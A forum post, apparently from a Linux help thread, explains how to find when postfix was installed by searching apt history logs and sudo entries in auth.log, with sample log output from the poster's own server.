As you can see, there was a match in my oldest logfile on the server: postfix was installed on 25th March 2014. The command used to install it was apt-get install postfix (it wasn't installed as a dependency).Code:sam@samhobbs:/var/log/apt$ cat history.log | grep -C 5 postfix sam@samhobbs:/var/log/apt$ for log in /var/log/apt/history.log.* ; do echo $log && zcat $log | grep -C 5 postfix ; done /var/log/apt/history.log.1.gz /var/log/apt/history.log.2.gz /var/log/apt/history.log.3.gz /var/log/apt/history.log.4.gz /var/log/apt/history.log.5.gz /var/log/apt/history.log.6.gz /var/log/apt/history.log.7.gz Commandline: apt-get install phpmyadmin Install: libjs-jquery-mousewheel:amd64 (8-2, automatic), libjs-jquery-metadata:amd64 (8-2, automatic), libjs-jquery-cookie:amd64 (8-2, automatic), libjs-jquery-event-drag:amd64 (8-2, automatic), dbconfig-common:amd64 (1.8.47+nmu1, automatic), php5-mcrypt:amd64 (5.4.6-0ubuntu3, automatic), libmcrypt4:amd64 (2.5.8-3.1, automatic), phpmyadmin:amd64 (4.0.6-1), libjs-jquery-ui:amd64 (1.10.1+dfsg-1, automatic), php5-json:amd64 (1.3.1+dfsg-2, automatic), libjs-underscore:amd64 (1.4.4-2ubuntu1, automatic), libjs-jquery-tablesorter:amd64 (8-2, automatic), php-gettext:amd64 (1.0.11-1, automatic), libjs-codemirror:amd64 (2.23-1, automatic), javascript-common:amd64 (11, automatic), php5-gd:amd64 (5.5.3+dfsg-1ubuntu2.2, automatic) End-Date: 2014-03-25 16:54:36 [B]Start-Date: 2014-03-25 18:00:39 Commandline: apt-get install postfix Install: postfix:amd64 (2.10.2-1) End-Date: 2014-03-25 18:00:46[/B] Start-Date: 2014-03-25 18:05:17 Commandline: apt-get install dovecot-common dovecot-imapd Install: dovecot-common:amd64 (2.1.7-7ubuntu3), dovecot-core:amd64 (2.1.7-7ubuntu3, automatic), dovecot-imapd:amd64 (2.1.7-7ubuntu3)
Depending on when you installed it, you may be able to see the log entry for your sudo command in /var/log/auth.log (or older versions) by using a command like this:
Unfortunately I can't give you a specific example matching when I installed postfix on my server because those log files are so old that they've been deleted.Code:zcat auth.log.4.gz | grep "sudo" | grep install
Each time sudo is used a log entry is made like this:
So if you did it recently, it might still be in your logs. Maybe that'll let you relax a bit.Code:Oct 9 22:47:30 samhobbs sudo: sam : TTY=pts/2 ; PWD=/etc/apache2/sites-enabled ; USER=root ; COMMAND=/usr/bin/apt-get update
Comment
Comment